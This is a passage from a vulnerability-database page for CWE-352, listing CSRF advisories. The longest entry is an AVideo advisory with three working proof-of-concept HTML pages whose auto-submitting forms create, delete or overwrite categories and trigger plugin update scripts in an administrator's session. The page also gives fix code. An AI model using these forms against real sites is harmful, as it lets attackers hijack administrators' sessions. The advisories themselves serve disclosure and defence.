CWE-352
AllowedCross-Site Request Forgery (CSRF)
Abstraction: Compound · Status: Stable
The web application does not, or cannot, sufficiently verify whether a request was intentionally provided by the user who sent the request, which could have originated from an unauthorized actor.
14162 vulnerabilities reference this CWE, most recent first.
GHSA-FF8G-JMQ6-3CGG
Vulnerability from github – Published: 2023-07-06 21:15 – Updated: 2024-04-04 05:46Cross-Site Request Forgery (CSRF) vulnerability in WPJoli Joli Table Of Contents plugin <= 1.3.9 versions.
{
"affected": [],
"aliases": [
"CVE-2022-46820"
],
"database_specific": {
"cwe_ids": [
"CWE-352"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-05-25T12:15:09Z",
"severity": "HIGH"
},
"details": "Cross-Site Request Forgery (CSRF) vulnerability in WPJoli Joli Table Of Contents plugin \u003c=\u00a01.3.9 versions.",
"id": "GHSA-ff8g-jmq6-3cgg",
"modified": "2024-04-04T05:46:37Z",
"published": "2023-07-06T21:15:05Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-46820"
},
{
"type": "WEB",
"url": "https://patchstack.com/database/vulnerability/joli-table-of-contents/wordpress-joli-table-of-contents-plugin-1-3-9-cross-site-request-forgery-csrf-on-reset-settings?_s_id=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L",
"type": "CVSS_V3"
}
]
}
GHSA-FFFG-CWC9-XVJ7
Vulnerability from github – Published: 2024-03-01 09:31 – Updated: 2024-08-30 14:30In mongo-express 1.0.2, /admin allows CSRF, as demonstrated by deletion of a Collection.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "mongo-express"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "1.0.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2023-52555"
],
"database_specific": {
"cwe_ids": [
"CWE-352"
],
"github_reviewed": true,
"github_reviewed_at": "2024-03-01T16:58:15Z",
"nvd_published_at": "2024-03-01T08:15:37Z",
"severity": "MODERATE"
},
"details": "In mongo-express 1.0.2, /admin allows CSRF, as demonstrated by deletion of a Collection.",
"id": "GHSA-fffg-cwc9-xvj7",
"modified": "2024-08-30T14:30:18Z",
"published": "2024-03-01T09:31:06Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52555"
},
{
"type": "WEB",
"url": "https://github.com/mongo-express/mongo-express/issues/1338"
},
{
"type": "PACKAGE",
"url": "https://github.com/mongo-express/mongo-express"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "mongo-express Cross-site Request Forgery vulnerability"
}
GHSA-FFG2-5FG9-QRWC
Vulnerability from github – Published: 2024-07-09 09:30 – Updated: 2026-04-08 18:33The Generate PDF using Contact Form 7 plugin for WordPress is vulnerable to Cross-Site Request Forgery to Arbitrary File Upload in versions up to, and including, 4.0.6. This is due to missing nonce validation and the plugin not properly validating a file or its path prior to deleting it in the 'wp_cf7_pdf_dashboard_html_page' function. This makes it possible for unauthenticated attackers to delete arbitrary files, including the wp-config.php file, which can make site takeover and remote code execution possible via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
{
"affected": [],
"aliases": [
"CVE-2024-6317"
],
"database_specific": {
"cwe_ids": [
"CWE-352"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-07-09T08:15:12Z",
"severity": "HIGH"
},
"details": "The Generate PDF using Contact Form 7 plugin for WordPress is vulnerable to Cross-Site Request Forgery to Arbitrary File Upload in versions up to, and including, 4.0.6. This is due to missing nonce validation and the plugin not properly validating a file or its path prior to deleting it in the \u0027wp_cf7_pdf_dashboard_html_page\u0027 function. This makes it possible for unauthenticated attackers to delete arbitrary files, including the wp-config.php file, which can make site takeover and remote code execution possible via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.",
"id": "GHSA-ffg2-5fg9-qrwc",
"modified": "2026-04-08T18:33:32Z",
"published": "2024-07-09T09:30:55Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-6317"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/browser/generate-pdf-using-contact-form-7/tags/4.0.6/inc/templates/cf7-pdf-generation.admin.html.php#L74"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/changeset/3146943/generate-pdf-using-contact-form-7"
},
{
"type": "WEB",
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/455b9695-e140-4bdb-b626-5c1695518563?source=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-FFG7-V4FF-CP8C
Vulnerability from github – Published: 2022-05-17 05:01 – Updated: 2022-05-17 05:01Multiple cross-site request forgery (CSRF) vulnerabilities on the Blue Coat ProxyAV appliance before 3.2.6.1 allow remote attackers to hijack the authentication of administrators for requests that (1) change a password, (2) modify a policy, or (3) restart the device.
{
"affected": [],
"aliases": [
"CVE-2010-5191"
],
"database_specific": {
"cwe_ids": [
"CWE-352"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2012-08-26T19:55:00Z",
"severity": "HIGH"
},
"details": "Multiple cross-site request forgery (CSRF) vulnerabilities on the Blue Coat ProxyAV appliance before 3.2.6.1 allow remote attackers to hijack the authentication of administrators for requests that (1) change a password, (2) modify a policy, or (3) restart the device.",
"id": "GHSA-ffg7-v4ff-cp8c",
"modified": "2022-05-17T05:01:01Z",
"published": "2022-05-17T05:01:01Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2010-5191"
},
{
"type": "WEB",
"url": "https://kb.bluecoat.com/index?page=content\u0026id=SA46"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-FFGP-P9FF-M7WF
Vulnerability from github – Published: 2024-10-04 06:30 – Updated: 2024-10-09 00:31The Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.8.6. This is due to missing or incorrect nonce validation on the admin_init or user_action_hook function. This makes it possible for unauthenticated attackers to modify a users membership status via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
{
"affected": [],
"aliases": [
"CVE-2024-8520"
],
"database_specific": {
"cwe_ids": [
"CWE-352"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-10-04T05:15:11Z",
"severity": "MODERATE"
},
"details": "The Ultimate Member \u2013 User Profile, Registration, Login, Member Directory, Content Restriction \u0026 Membership Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.8.6. This is due to missing or incorrect nonce validation on the admin_init or user_action_hook function. This makes it possible for unauthenticated attackers to modify a users membership status via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.",
"id": "GHSA-ffgp-p9ff-m7wf",
"modified": "2024-10-09T00:31:18Z",
"published": "2024-10-04T06:30:45Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-8520"
},
{
"type": "WEB",
"url": "https://github.com/ultimatemember/ultimatemember/pull/1549"
},
{
"type": "WEB",
"url": "https://github.com/ultimatemember/ultimatemember/blob/7b8a7a7c039bde4539c07e049b19036192f1c133/includes/admin/class-admin.php#L1880"
},
{
"type": "WEB",
"url": "https://github.com/ultimatemember/ultimatemember/blob/7b8a7a7c039bde4539c07e049b19036192f1c133/includes/admin/class-admin.php#L1945"
},
{
"type": "WEB",
"url": "https://github.com/ultimatemember/ultimatemember/blob/7b8a7a7c039bde4539c07e049b19036192f1c133/includes/admin/class-admin.php#L1948C1-L1959C6"
},
{
"type": "WEB",
"url": "https://github.com/ultimatemember/ultimatemember/blob/7b8a7a7c039bde4539c07e049b19036192f1c133/includes/admin/class-admin.php#L70C4-L70C84"
},
{
"type": "WEB",
"url": "https://github.com/ultimatemember/ultimatemember/blob/7b8a7a7c039bde4539c07e049b19036192f1c133/includes/admin/core/class-admin-users.php#L146C1-L173C12"
},
{
"type": "WEB",
"url": "https://github.com/ultimatemember/ultimatemember/blob/7b8a7a7c039bde4539c07e049b19036192f1c133/includes/admin/core/class-admin-users.php#L175C1-L178C7"
},
{
"type": "WEB",
"url": "https://github.com/ultimatemember/ultimatemember/blob/7b8a7a7c039bde4539c07e049b19036192f1c133/includes/admin/core/class-admin-users.php#L41C4-L41C90"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/changeset/3160947/ultimate-member/trunk/includes/admin/class-admin.php"
},
{
"type": "WEB",
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7ffddc03-d4ae-460e-972a-98804d947d09?source=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-FFJG-78H3-Q2J5
Vulnerability from github – Published: 2022-05-17 04:44 – Updated: 2022-05-17 04:44Cross-site request forgery (CSRF) vulnerability in the Admin web interface in OpenVPN Access Server before 1.8.5 allows remote attackers to hijack the authentication of administrators for requests that create administrative users.
{
"affected": [],
"aliases": [
"CVE-2013-2692"
],
"database_specific": {
"cwe_ids": [
"CWE-352"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2014-05-13T14:55:00Z",
"severity": "MODERATE"
},
"details": "Cross-site request forgery (CSRF) vulnerability in the Admin web interface in OpenVPN Access Server before 1.8.5 allows remote attackers to hijack the authentication of administrators for requests that create administrative users.",
"id": "GHSA-ffjg-78h3-q2j5",
"modified": "2022-05-17T04:44:00Z",
"published": "2022-05-17T04:44:00Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2013-2692"
},
{
"type": "WEB",
"url": "http://openvpn.net/index.php/access-server/download-openvpn-as-sw/531-release-notes-v185.html"
},
{
"type": "WEB",
"url": "http://osvdb.org/93111"
},
{
"type": "WEB",
"url": "http://secunia.com/advisories/52802"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-FFMM-98MJ-4MGX
Vulnerability from github – Published: 2025-04-09 18:30 – Updated: 2026-04-01 18:34Cross-Site Request Forgery (CSRF) vulnerability in Jordi Salord WP-Easy Menu allows Stored XSS. This issue affects WP-Easy Menu: from n/a through 0.41.
{
"affected": [],
"aliases": [
"CVE-2025-32477"
],
"database_specific": {
"cwe_ids": [
"CWE-352"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-04-09T17:15:39Z",
"severity": "HIGH"
},
"details": "Cross-Site Request Forgery (CSRF) vulnerability in Jordi Salord WP-Easy Menu allows Stored XSS. This issue affects WP-Easy Menu: from n/a through 0.41.",
"id": "GHSA-ffmm-98mj-4mgx",
"modified": "2026-04-01T18:34:35Z",
"published": "2025-04-09T18:30:52Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-32477"
},
{
"type": "WEB",
"url": "https://patchstack.com/database/wordpress/plugin/wp-easy-menu/vulnerability/wordpress-wp-easy-menu-plugin-0-41-csrf-to-stored-xss-vulnerability?_s_id=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L",
"type": "CVSS_V3"
}
]
}
GHSA-FFPC-23X7-9CWJ
Vulnerability from github – Published: 2025-06-14 09:32 – Updated: 2025-06-14 09:32The Yougler Blogger Profile Page plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, v1.01. This is due to missing or incorrect nonce validation on the 'yougler-plugin.php' page. This makes it possible for unauthenticated attackers to update the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
{
"affected": [],
"aliases": [
"CVE-2025-6062"
],
"database_specific": {
"cwe_ids": [
"CWE-352"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-06-14T09:15:24Z",
"severity": "MODERATE"
},
"details": "The Yougler Blogger Profile Page plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, v1.01. This is due to missing or incorrect nonce validation on the \u0027yougler-plugin.php\u0027 page. This makes it possible for unauthenticated attackers to update the plugin\u0027s settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.",
"id": "GHSA-ffpc-23x7-9cwj",
"modified": "2025-06-14T09:32:03Z",
"published": "2025-06-14T09:32:03Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-6062"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/browser/yougler-blogger-profile-page/trunk/yougler-plugin.php"
},
{
"type": "WEB",
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7102fb97-96a4-4fd9-824d-6fa6d483f37a?source=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-FFRJ-45C9-C9W8
Vulnerability from github – Published: 2024-12-02 15:31 – Updated: 2026-04-01 18:32Cross-Site Request Forgery (CSRF) vulnerability in ITERAS ITERAS allows Stored XSS.This issue affects ITERAS: from n/a through 1.7.0.
{
"affected": [],
"aliases": [
"CVE-2024-53710"
],
"database_specific": {
"cwe_ids": [
"CWE-352"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-12-02T14:15:13Z",
"severity": "HIGH"
},
"details": "Cross-Site Request Forgery (CSRF) vulnerability in ITERAS ITERAS allows Stored XSS.This issue affects ITERAS: from n/a through 1.7.0.",
"id": "GHSA-ffrj-45c9-c9w8",
"modified": "2026-04-01T18:32:38Z",
"published": "2024-12-02T15:31:39Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-53710"
},
{
"type": "WEB",
"url": "https://patchstack.com/database/wordpress/plugin/iteras/vulnerability/wordpress-iteras-plugin-1-7-0-csrf-to-stored-xss-vulnerability?_s_id=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L",
"type": "CVSS_V3"
}
]
}
GHSA-FFW8-FWXP-H64W
Vulnerability from github – Published: 2026-04-14 23:12 – Updated: 2026-04-24 20:31Summary
Three admin-only JSON endpoints — objects/categoryAddNew.json.php, objects/categoryDelete.json.php, and objects/pluginRunUpdateScript.json.php — enforce only a role check (Category::canCreateCategory() / User::isAdmin()) and perform state-changing actions against the database without calling isGlobalTokenValid() or forbidIfIsUntrustedRequest(). Peer endpoints in the same directory (pluginSwitch.json.php, pluginRunDatabaseScript.json.php) do enforce the CSRF token, so the missing checks are an omission rather than a design choice. An attacker who lures a logged-in admin to a malicious page can create, update, or delete categories and force execution of any installed plugin's updateScript() method in the admin's session.
Details
AVideo's CSRF defense is not applied globally — each endpoint must explicitly call isGlobalTokenValid() (defined in objects/functions.php:2313), which verifies $_REQUEST['globalToken']. A search across the codebase shows 18 files that correctly invoke forbidIfIsUntrustedRequest() or isGlobalTokenValid(), while the three endpoints below do not.
1. objects/categoryAddNew.json.php:18 — CSRF create/overwrite category
18 if (!Category::canCreateCategory()) {
19 $obj->msg = __("Permission denied");
20 die(json_encode($obj));
21 }
22
23 $objCat = new Category(intval(@$_POST['id']));
24 $objCat->setName($_POST['name']);
25 $objCat->setClean_name($_POST['clean_name']);
26 $objCat->setDescription($_POST['description']);
27 $objCat->setIconClass($_POST['iconClass']);
28 $objCat->setSuggested($_POST['suggested']);
29 $objCat->setParentId($_POST['parentId']);
30 $objCat->setPrivate($_POST['private']);
31 $objCat->setAllow_download($_POST['allow_download']);
32 $objCat->setOrder($_POST['order']);
33 $obj->categories_id = $objCat->save();
Category::canCreateCategory() (objects/category.php:620-630) returns true for any admin. Because the row is loaded via new Category(intval(@$_POST['id'])), a non-zero id causes the existing row to be overwritten, not just created — the same primitive can mutate existing categories. No CSRF/Origin check precedes the write.
2. objects/categoryDelete.json.php:10 — CSRF delete category
10 if (!Category::canCreateCategory()) {
11 die('{"error":"' . __("Permission denied") . '"}');
12 }
13 require_once 'category.php';
14 $obj = new Category($_POST['id']);
15 $response = $obj->delete();
No token check. An attacker can force an admin browser to POST any id, deleting rows from categories.
3. objects/pluginRunUpdateScript.json.php:9 — CSRF forced plugin update
9 if (!User::isAdmin()) {
10 forbiddenPage('Permission denied');
11 }
12 if (empty($_POST['name'])) {
13 forbiddenPage('Name can\'t be blank');
14 }
15 ini_set('max_execution_time', 300);
16 require_once $global['systemRootPath'] . 'plugin/AVideoPlugin.php';
17
18 if($_POST['uuid'] == 'plist12345-370-4b1f-977a-fd0e5cabtube'){
19 $_POST['name'] = 'PlayLists';
20 }
21
22 $obj = new stdClass();
23 $obj->error = !AVideoPlugin::updatePlugin($_POST['name']);
AVideoPlugin::updatePlugin() (plugin/AVideoPlugin.php:1452) looks up the plugin by name and, if it defines an updateScript() method, invokes it and then records the new plugin version via Plugin::setCurrentVersionByUuid. No CSRF or Origin check precedes this. By contrast, the sibling endpoint objects/pluginRunDatabaseScript.json.php:16 does call isGlobalTokenValid(), and objects/pluginSwitch.json.php:12 also calls it — confirming this file is an omission.
Why no global mitigation blocks this
isGlobalTokenValid()is not invoked fromobjects/configuration.phpor any other bootstrap; it must be called per-endpoint.isUntrustedRequest()(objects/functionsSecurity.php:146) is only triggered via an explicit call toforbidIfIsUntrustedRequest(); none of the three endpoints call it.- The handlers use
$_POSTdirectly without any framework-level CSRF middleware (AVideo does not use one). Category::canCreateCategory()is purely a role check and does not examine request origin or tokens.
PoC
All three require the victim to be a logged-in AVideo administrator who visits the attacker-hosted page. Cookies are sent automatically by the browser.
PoC 1 — Create/overwrite category
<!-- evil-create.html -->
<html><body>
<form id=f action="https://victim.example.com/objects/categoryAddNew.json.php" method="POST">
<input name="id" value="0"> <!-- 0 = create; any existing id = overwrite -->
<input name="name" value="Owned">
<input name="clean_name" value="owned">
<input name="description" value="pwn">
<input name="iconClass" value="fas fa-skull">
<input name="suggested" value="1">
<input name="parentId" value="0">
<input name="private" value="0">
<input name="allow_download" value="1">
<input name="order" value="1">
</form>
<script>document.getElementById('f').submit();</script>
</body></html>
Expected: a new row appears in the categories table, returned as {"error":false,"categories_id":<n>,...}. Changing id=0 to an existing category id overwrites that row's fields.
PoC 2 — Delete category
<!-- evil-delete.html -->
<html><body>
<form id=f action="https://victim.example.com/objects/categoryDelete.json.php" method="POST">
<input name="id" value="2">
</form>
<script>document.getElementById('f').submit();</script>
</body></html>
Multiple hidden iframes with different id values can walk the category id space and wipe the category tree.
PoC 3 — Force plugin updateScript()
<!-- evil-plugin-update.html -->
<html><body>
<form id=f action="https://victim.example.com/objects/pluginRunUpdateScript.json.php" method="POST">
<input name="name" value="Live">
<input name="uuid" value="anything">
</form>
<script>document.getElementById('f').submit();</script>
</body></html>
Expected: server logs AVideoPlugin::updatePlugin name=(Live) uuid=(...) and the plugin's updateScript() runs in the admin's session, with execution time extended to 300s.
Impact
- Integrity: An attacker can silently cause the admin's browser to create, mutate, or delete rows in the
categoriestable. Overwrite is especially damaging because field-level state (parent, privacy, allow_download, clean_name, iconClass) is changed without any UI feedback to the admin. Combined with any view that rendersdescriptionwithout escaping, this becomes a vector for stored XSS propagation. - Availability (partial):
categoryDelete.json.phpis a pure destructive primitive that allows category rows to be removed one by one by iterating ids; there is no recovery flow. - Privileged code execution trigger:
pluginRunUpdateScript.json.phplets the attacker force execution of any installed plugin'supdateScript()method (with a 5-minute execution window) in the admin's context. When chained with other primitives that influence plugin state or the plugin's own update logic, this is a foothold for deeper compromise. - Blast radius: Each vulnerable endpoint requires only a single admin visit to any attacker-controlled page (XSS on a third-party site, a phishing link, a forum post with an auto-submitting form). No interaction beyond loading the page is required.
Recommended Fix
Add an explicit CSRF token check (and ideally an Origin check) to each endpoint, matching the pattern already used by pluginSwitch.json.php and pluginRunDatabaseScript.json.php.
// objects/categoryAddNew.json.php (after line 18)
if (!Category::canCreateCategory()) {
$obj->msg = __("Permission denied");
die(json_encode($obj));
}
if (!isGlobalTokenValid()) {
http_response_code(403);
die('{"error":"' . __('Invalid token') . '"}');
}
forbidIfIsUntrustedRequest();
// objects/categoryDelete.json.php (after line 12)
if (!Category::canCreateCategory()) {
die('{"error":"' . __("Permission denied") . '"}');
}
if (!isGlobalTokenValid()) {
http_response_code(403);
die('{"error":"' . __('Invalid token') . '"}');
}
forbidIfIsUntrustedRequest();
// objects/pluginRunUpdateScript.json.php (after line 11)
if (!User::isAdmin()) {
forbiddenPage('Permission denied');
}
if (!isGlobalTokenValid()) {
http_response_code(403);
die('{"error":"' . __('Invalid token') . '"}');
}
forbidIfIsUntrustedRequest();
The long-term fix is to apply forbidIfIsUntrustedRequest() to every state-changing JSON endpoint via a shared include (e.g., a mandatory bootstrap file loaded by all *.json.php endpoints), so that future handlers cannot forget the check.
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "wwbn/avideo"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "29.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-40926"
],
"database_specific": {
"cwe_ids": [
"CWE-352"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-14T23:12:39Z",
"nvd_published_at": "2026-04-21T23:16:20Z",
"severity": "HIGH"
},
"details": "## Summary\n\nThree admin-only JSON endpoints \u2014 `objects/categoryAddNew.json.php`, `objects/categoryDelete.json.php`, and `objects/pluginRunUpdateScript.json.php` \u2014 enforce only a role check (`Category::canCreateCategory()` / `User::isAdmin()`) and perform state-changing actions against the database without calling `isGlobalTokenValid()` or `forbidIfIsUntrustedRequest()`. Peer endpoints in the same directory (`pluginSwitch.json.php`, `pluginRunDatabaseScript.json.php`) do enforce the CSRF token, so the missing checks are an omission rather than a design choice. An attacker who lures a logged-in admin to a malicious page can create, update, or delete categories and force execution of any installed plugin\u0027s `updateScript()` method in the admin\u0027s session.\n\n## Details\n\nAVideo\u0027s CSRF defense is not applied globally \u2014 each endpoint must explicitly call `isGlobalTokenValid()` (defined in `objects/functions.php:2313`), which verifies `$_REQUEST[\u0027globalToken\u0027]`. A search across the codebase shows 18 files that correctly invoke `forbidIfIsUntrustedRequest()` or `isGlobalTokenValid()`, while the three endpoints below do not.\n\n### 1. `objects/categoryAddNew.json.php:18` \u2014 CSRF create/overwrite category\n\n```php\n 18 if (!Category::canCreateCategory()) {\n 19 $obj-\u003emsg = __(\"Permission denied\");\n 20 die(json_encode($obj));\n 21 }\n 22\n 23 $objCat = new Category(intval(@$_POST[\u0027id\u0027]));\n 24 $objCat-\u003esetName($_POST[\u0027name\u0027]);\n 25 $objCat-\u003esetClean_name($_POST[\u0027clean_name\u0027]);\n 26 $objCat-\u003esetDescription($_POST[\u0027description\u0027]);\n 27 $objCat-\u003esetIconClass($_POST[\u0027iconClass\u0027]);\n 28 $objCat-\u003esetSuggested($_POST[\u0027suggested\u0027]);\n 29 $objCat-\u003esetParentId($_POST[\u0027parentId\u0027]);\n 30 $objCat-\u003esetPrivate($_POST[\u0027private\u0027]);\n 31 $objCat-\u003esetAllow_download($_POST[\u0027allow_download\u0027]);\n 32 $objCat-\u003esetOrder($_POST[\u0027order\u0027]);\n 33 $obj-\u003ecategories_id = $objCat-\u003esave();\n```\n\n`Category::canCreateCategory()` (`objects/category.php:620-630`) returns true for any admin. Because the row is loaded via `new Category(intval(@$_POST[\u0027id\u0027]))`, a non-zero `id` causes the existing row to be overwritten, not just created \u2014 the same primitive can mutate existing categories. No CSRF/Origin check precedes the write.\n\n### 2. `objects/categoryDelete.json.php:10` \u2014 CSRF delete category\n\n```php\n 10 if (!Category::canCreateCategory()) {\n 11 die(\u0027{\"error\":\"\u0027 . __(\"Permission denied\") . \u0027\"}\u0027);\n 12 }\n 13 require_once \u0027category.php\u0027;\n 14 $obj = new Category($_POST[\u0027id\u0027]);\n 15 $response = $obj-\u003edelete();\n```\n\nNo token check. An attacker can force an admin browser to POST any `id`, deleting rows from `categories`.\n\n### 3. `objects/pluginRunUpdateScript.json.php:9` \u2014 CSRF forced plugin update\n\n```php\n 9 if (!User::isAdmin()) {\n 10 forbiddenPage(\u0027Permission denied\u0027);\n 11 }\n 12 if (empty($_POST[\u0027name\u0027])) {\n 13 forbiddenPage(\u0027Name can\\\u0027t be blank\u0027);\n 14 }\n 15 ini_set(\u0027max_execution_time\u0027, 300);\n 16 require_once $global[\u0027systemRootPath\u0027] . \u0027plugin/AVideoPlugin.php\u0027;\n 17\n 18 if($_POST[\u0027uuid\u0027] == \u0027plist12345-370-4b1f-977a-fd0e5cabtube\u0027){\n 19 $_POST[\u0027name\u0027] = \u0027PlayLists\u0027;\n 20 }\n 21\n 22 $obj = new stdClass();\n 23 $obj-\u003eerror = !AVideoPlugin::updatePlugin($_POST[\u0027name\u0027]);\n```\n\n`AVideoPlugin::updatePlugin()` (`plugin/AVideoPlugin.php:1452`) looks up the plugin by name and, if it defines an `updateScript()` method, invokes it and then records the new plugin version via `Plugin::setCurrentVersionByUuid`. No CSRF or Origin check precedes this. By contrast, the sibling endpoint `objects/pluginRunDatabaseScript.json.php:16` does call `isGlobalTokenValid()`, and `objects/pluginSwitch.json.php:12` also calls it \u2014 confirming this file is an omission.\n\n### Why no global mitigation blocks this\n\n- `isGlobalTokenValid()` is not invoked from `objects/configuration.php` or any other bootstrap; it must be called per-endpoint.\n- `isUntrustedRequest()` (`objects/functionsSecurity.php:146`) is only triggered via an explicit call to `forbidIfIsUntrustedRequest()`; none of the three endpoints call it.\n- The handlers use `$_POST` directly without any framework-level CSRF middleware (AVideo does not use one).\n- `Category::canCreateCategory()` is purely a role check and does not examine request origin or tokens.\n\n## PoC\n\nAll three require the victim to be a logged-in AVideo administrator who visits the attacker-hosted page. Cookies are sent automatically by the browser.\n\n### PoC 1 \u2014 Create/overwrite category\n\n```html\n\u003c!-- evil-create.html --\u003e\n\u003chtml\u003e\u003cbody\u003e\n\u003cform id=f action=\"https://victim.example.com/objects/categoryAddNew.json.php\" method=\"POST\"\u003e\n \u003cinput name=\"id\" value=\"0\"\u003e \u003c!-- 0 = create; any existing id = overwrite --\u003e\n \u003cinput name=\"name\" value=\"Owned\"\u003e\n \u003cinput name=\"clean_name\" value=\"owned\"\u003e\n \u003cinput name=\"description\" value=\"pwn\"\u003e\n \u003cinput name=\"iconClass\" value=\"fas fa-skull\"\u003e\n \u003cinput name=\"suggested\" value=\"1\"\u003e\n \u003cinput name=\"parentId\" value=\"0\"\u003e\n \u003cinput name=\"private\" value=\"0\"\u003e\n \u003cinput name=\"allow_download\" value=\"1\"\u003e\n \u003cinput name=\"order\" value=\"1\"\u003e\n\u003c/form\u003e\n\u003cscript\u003edocument.getElementById(\u0027f\u0027).submit();\u003c/script\u003e\n\u003c/body\u003e\u003c/html\u003e\n```\n\nExpected: a new row appears in the `categories` table, returned as `{\"error\":false,\"categories_id\":\u003cn\u003e,...}`. Changing `id=0` to an existing category id overwrites that row\u0027s fields.\n\n### PoC 2 \u2014 Delete category\n\n```html\n\u003c!-- evil-delete.html --\u003e\n\u003chtml\u003e\u003cbody\u003e\n\u003cform id=f action=\"https://victim.example.com/objects/categoryDelete.json.php\" method=\"POST\"\u003e\n \u003cinput name=\"id\" value=\"2\"\u003e\n\u003c/form\u003e\n\u003cscript\u003edocument.getElementById(\u0027f\u0027).submit();\u003c/script\u003e\n\u003c/body\u003e\u003c/html\u003e\n```\n\nMultiple hidden iframes with different `id` values can walk the category id space and wipe the category tree.\n\n### PoC 3 \u2014 Force plugin updateScript()\n\n```html\n\u003c!-- evil-plugin-update.html --\u003e\n\u003chtml\u003e\u003cbody\u003e\n\u003cform id=f action=\"https://victim.example.com/objects/pluginRunUpdateScript.json.php\" method=\"POST\"\u003e\n \u003cinput name=\"name\" value=\"Live\"\u003e\n \u003cinput name=\"uuid\" value=\"anything\"\u003e\n\u003c/form\u003e\n\u003cscript\u003edocument.getElementById(\u0027f\u0027).submit();\u003c/script\u003e\n\u003c/body\u003e\u003c/html\u003e\n```\n\nExpected: server logs `AVideoPlugin::updatePlugin name=(Live) uuid=(...)` and the plugin\u0027s `updateScript()` runs in the admin\u0027s session, with execution time extended to 300s.\n\n## Impact\n\n- **Integrity:** An attacker can silently cause the admin\u0027s browser to create, mutate, or delete rows in the `categories` table. Overwrite is especially damaging because field-level state (parent, privacy, allow_download, clean_name, iconClass) is changed without any UI feedback to the admin. Combined with any view that renders `description` without escaping, this becomes a vector for stored XSS propagation.\n- **Availability (partial):** `categoryDelete.json.php` is a pure destructive primitive that allows category rows to be removed one by one by iterating ids; there is no recovery flow.\n- **Privileged code execution trigger:** `pluginRunUpdateScript.json.php` lets the attacker force execution of any installed plugin\u0027s `updateScript()` method (with a 5-minute execution window) in the admin\u0027s context. When chained with other primitives that influence plugin state or the plugin\u0027s own update logic, this is a foothold for deeper compromise.\n- **Blast radius:** Each vulnerable endpoint requires only a single admin visit to any attacker-controlled page (XSS on a third-party site, a phishing link, a forum post with an auto-submitting form). No interaction beyond loading the page is required.\n\n## Recommended Fix\n\nAdd an explicit CSRF token check (and ideally an Origin check) to each endpoint, matching the pattern already used by `pluginSwitch.json.php` and `pluginRunDatabaseScript.json.php`.\n\n```php\n// objects/categoryAddNew.json.php (after line 